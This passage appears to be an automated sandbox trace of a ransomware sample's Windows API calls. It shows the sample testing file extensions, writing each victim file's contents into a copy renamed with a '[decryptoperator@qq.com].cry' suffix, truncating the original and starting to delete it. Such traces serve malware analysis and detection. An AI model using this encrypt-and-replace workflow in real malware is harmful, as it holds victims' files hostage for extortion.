Shared\\Stationery\\Bears.jpg.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.694] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.694] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.694] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.694] lstrlenW (lpString=".doc") returned 4 [0042.694] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.694] lstrlenW (lpString=".docx") returned 5 [0042.694] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0042.694] lstrlenW (lpString=".pdf") returned 4 [0042.694] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.694] lstrlenW (lpString=".xls") returned 4 [0042.694] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.694] lstrlenW (lpString=".xlsx") returned 5 [0042.694] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0042.694] lstrlenW (lpString=".ppt") returned 4 [0042.694] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.694] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.694] lstrlenW (lpString=".zip") returned 4 [0042.694] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.694] lstrlenW (lpString=".rar") returned 4 [0042.694] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.694] lstrlenW (lpString=".bz2") returned 4 [0042.694] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.694] lstrlenW (lpString=".7z") returned 3 [0042.695] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.695] lstrlenW (lpString=".dbf") returned 4 [0042.695] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.695] lstrlenW (lpString=".1cd") returned 4 [0042.695] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.695] lstrlenW (lpString=".jpg") returned 4 [0042.695] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.695] lstrlenW (lpString=".doc") returned 4 [0042.695] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.695] lstrlenW (lpString=".docx") returned 5 [0042.695] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0042.695] lstrlenW (lpString=".pdf") returned 4 [0042.695] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.695] lstrlenW (lpString=".xls") returned 4 [0042.695] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.695] lstrlenW (lpString=".xlsx") returned 5 [0042.695] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0042.695] lstrlenW (lpString=".ppt") returned 4 [0042.695] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.695] lstrlenW (lpString=".zip") returned 4 [0042.695] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.695] lstrlenW (lpString=".rar") returned 4 [0042.695] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.695] lstrlenW (lpString=".bz2") returned 4 [0042.695] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.695] lstrlenW (lpString=".7z") returned 3 [0042.696] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.696] lstrlenW (lpString=".dbf") returned 4 [0042.696] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.696] lstrlenW (lpString=".1cd") returned 4 [0042.696] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0042.696] lstrlenW (lpString=".jpg") returned 4 [0042.696] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.696] lstrcmpiW (lpString1=".jpg", lpString2=".cry") returned 1 [0042.696] lstrlenW (lpString="Blue_Gradient.jpg") returned 17 [0042.696] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0042.697] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=2575) returned 1 [0042.697] CloseHandle (hObject=0x1bc) returned 1 [0042.697] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg")) returned 0x20 [0042.697] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.697] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.697] lstrlenW (lpString=".doc") returned 4 [0042.697] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.697] lstrlenW (lpString=".docx") returned 5 [0042.697] lstrcmpiW (lpString1=".docx", lpString2="t.jpg") returned -1 [0042.697] lstrlenW (lpString=".pdf") returned 4 [0042.697] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.697] lstrlenW (lpString=".xls") returned 4 [0042.697] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.697] lstrlenW (lpString=".xlsx") returned 5 [0042.697] lstrcmpiW (lpString1=".xlsx", lpString2="t.jpg") returned -1 [0042.697] lstrlenW (lpString=".ppt") returned 4 [0042.697] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.697] lstrlenW (lpString=".zip") returned 4 [0042.698] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.698] lstrlenW (lpString=".rar") returned 4 [0042.698] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.698] lstrlenW (lpString=".bz2") returned 4 [0042.698] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.698] lstrlenW (lpString=".7z") returned 3 [0042.698] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.698] lstrlenW (lpString=".dbf") returned 4 [0042.698] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.698] lstrlenW (lpString=".1cd") returned 4 [0042.698] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.698] lstrlenW (lpString=".jpg") returned 4 [0042.698] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.698] lstrlenW (lpString=".doc") returned 4 [0042.698] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0042.698] lstrlenW (lpString=".docx") returned 5 [0042.698] lstrcmpiW (lpString1=".docx", lpString2="t.jpg") returned -1 [0042.698] lstrlenW (lpString=".pdf") returned 4 [0042.698] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0042.698] lstrlenW (lpString=".xls") returned 4 [0042.698] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0042.698] lstrlenW (lpString=".xlsx") returned 5 [0042.698] lstrcmpiW (lpString1=".xlsx", lpString2="t.jpg") returned -1 [0042.698] lstrlenW (lpString=".ppt") returned 4 [0042.698] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0042.698] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.698] lstrlenW (lpString=".zip") returned 4 [0042.698] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0042.698] lstrlenW (lpString=".rar") returned 4 [0042.698] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0042.698] lstrlenW (lpString=".bz2") returned 4 [0042.698] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0042.699] lstrlenW (lpString=".7z") returned 3 [0042.699] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0042.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.699] lstrlenW (lpString=".dbf") returned 4 [0042.699] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0042.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.699] lstrlenW (lpString=".1cd") returned 4 [0042.699] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0042.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned 75 [0042.699] lstrlenW (lpString=".jpg") returned 4 [0042.699] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0042.699] lstrcmpiW (lpString1=".gif", lpString2=".cry") returned 1 [0042.699] lstrlenW (lpString="Cave_Drawings.gif") returned 17 [0042.699] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0042.699] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=4587) returned 1 [0042.699] CloseHandle (hObject=0x1bc) returned 1 [0042.699] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif")) returned 0x20 [0042.699] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.699] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.699] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.700] lstrlenW (lpString=".doc") returned 4 [0042.700] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0042.700] lstrlenW (lpString=".docx") returned 5 [0042.700] lstrcmpiW (lpString1=".docx", lpString2="s.gif") returned -1 [0042.700] lstrlenW (lpString=".pdf") returned 4 [0042.700] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0042.700] lstrlenW (lpString=".xls") returned 4 [0042.700] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0042.700] lstrlenW (lpString=".xlsx") returned 5 [0042.700] lstrcmpiW (lpString1=".xlsx", lpString2="s.gif") returned -1 [0042.700] lstrlenW (lpString=".ppt") returned 4 [0042.700] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0042.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.700] lstrlenW (lpString=".zip") returned 4 [0042.700] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0042.700] lstrlenW (lpString=".rar") returned 4 [0042.700] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0042.700] lstrlenW (lpString=".bz2") returned 4 [0042.700] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0042.700] lstrlenW (lpString=".7z") returned 3 [0042.700] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0042.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.700] lstrlenW (lpString=".dbf") returned 4 [0042.700] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0042.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.700] lstrlenW (lpString=".1cd") returned 4 [0042.700] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0042.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.700] lstrlenW (lpString=".jpg") returned 4 [0042.700] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0042.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.700] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.700] lstrlenW (lpString=".doc") returned 4 [0042.700] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0042.700] lstrlenW (lpString=".docx") returned 5 [0042.701] lstrcmpiW (lpString1=".docx", lpString2="s.gif") returned -1 [0042.701] lstrlenW (lpString=".pdf") returned 4 [0042.701] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0042.701] lstrlenW (lpString=".xls") returned 4 [0042.701] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0042.701] lstrlenW (lpString=".xlsx") returned 5 [0042.701] lstrcmpiW (lpString1=".xlsx", lpString2="s.gif") returned -1 [0042.701] lstrlenW (lpString=".ppt") returned 4 [0042.701] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0042.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.701] lstrlenW (lpString=".zip") returned 4 [0042.701] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0042.701] lstrlenW (lpString=".rar") returned 4 [0042.701] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0042.701] lstrlenW (lpString=".bz2") returned 4 [0042.701] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0042.701] lstrlenW (lpString=".7z") returned 3 [0042.701] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0042.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.701] lstrlenW (lpString=".dbf") returned 4 [0042.701] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0042.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.701] lstrlenW (lpString=".1cd") returned 4 [0042.701] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0042.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75 [0042.701] lstrlenW (lpString=".jpg") returned 4 [0042.701] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0042.701] lstrcmpiW (lpString1=".gif", lpString2=".cry") returned 1 [0042.701] lstrlenW (lpString="Connectivity.gif") returned 16 [0042.701] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0042.702] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=2319) returned 1 [0042.702] CloseHandle (hObject=0x1bc) returned 1 [0042.702] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif")) returned 0x20 [0042.702] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.702] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.702] lstrlenW (lpString=".doc") returned 4 [0042.702] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0042.702] lstrlenW (lpString=".docx") returned 5 [0042.702] lstrcmpiW (lpString1=".docx", lpString2="y.gif") returned -1 [0042.702] lstrlenW (lpString=".pdf") returned 4 [0042.702] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0042.702] lstrlenW (lpString=".xls") returned 4 [0042.702] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0042.702] lstrlenW (lpString=".xlsx") returned 5 [0042.702] lstrcmpiW (lpString1=".xlsx", lpString2="y.gif") returned -1 [0042.702] lstrlenW (lpString=".ppt") returned 4 [0042.702] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0042.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.702] lstrlenW (lpString=".zip") returned 4 [0042.702] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0042.702] lstrlenW (lpString=".rar") returned 4 [0042.702] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0042.702] lstrlenW (lpString=".bz2") returned 4 [0042.702] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0042.702] lstrlenW (lpString=".7z") returned 3 [0042.703] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0042.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.703] lstrlenW (lpString=".dbf") returned 4 [0042.703] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0042.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.703] lstrlenW (lpString=".1cd") returned 4 [0042.703] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0042.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.703] lstrlenW (lpString=".jpg") returned 4 [0042.703] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0042.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.703] lstrlenW (lpString=".doc") returned 4 [0042.703] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0042.703] lstrlenW (lpString=".docx") returned 5 [0042.703] lstrcmpiW (lpString1=".docx", lpString2="y.gif") returned -1 [0042.703] lstrlenW (lpString=".pdf") returned 4 [0042.703] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0042.703] lstrlenW (lpString=".xls") returned 4 [0042.703] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0042.703] lstrlenW (lpString=".xlsx") returned 5 [0042.703] lstrcmpiW (lpString1=".xlsx", lpString2="y.gif") returned -1 [0042.703] lstrlenW (lpString=".ppt") returned 4 [0042.703] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0042.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.703] lstrlenW (lpString=".zip") returned 4 [0042.703] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0042.703] lstrlenW (lpString=".rar") returned 4 [0042.703] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0042.703] lstrlenW (lpString=".bz2") returned 4 [0042.703] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0042.703] lstrlenW (lpString=".7z") returned 3 [0042.703] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0042.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.703] lstrlenW (lpString=".dbf") returned 4 [0042.703] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0042.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.703] lstrlenW (lpString=".1cd") returned 4 [0042.704] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0042.704] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74 [0042.704] lstrlenW (lpString=".jpg") returned 4 [0042.704] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0042.704] lstrcmpiW (lpString1=".ini", lpString2=".cry") returned 1 [0042.704] lstrlenW (lpString="Desktop.ini") returned 11 [0042.704] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0042.704] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=645) returned 1 [0042.704] CloseHandle (hObject=0x1bc) returned 1 [0042.704] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini")) returned 0x26 [0042.704] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.704] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0042.704] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0042.704] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0042.704] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0042.705] GetLastError () returned 0x0 [0042.705] ReadFile (in: hFile=0x1bc, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x285, lpOverlapped=0x0) returned 1 [0042.706] WriteFile (in: hFile=0x178, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x290, lpOverlapped=0x0) returned 1 [0042.707] ReadFile (in: hFile=0x1bc, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0042.707] WriteFile (in: hFile=0x178, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xea, lpOverlapped=0x0) returned 1 [0042.707] SetEndOfFile (hFile=0x178) returned 1 [0042.707] CloseHandle (hObject=0x178) returned 1 [0042.707] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0042.707] SetEndOfFile (hFile=0x1bc) returned 1 [0042.708] CloseHandle (hObject=0x1bc) returned 1 [0042.708] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x26) returned 1 [0042.709] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft 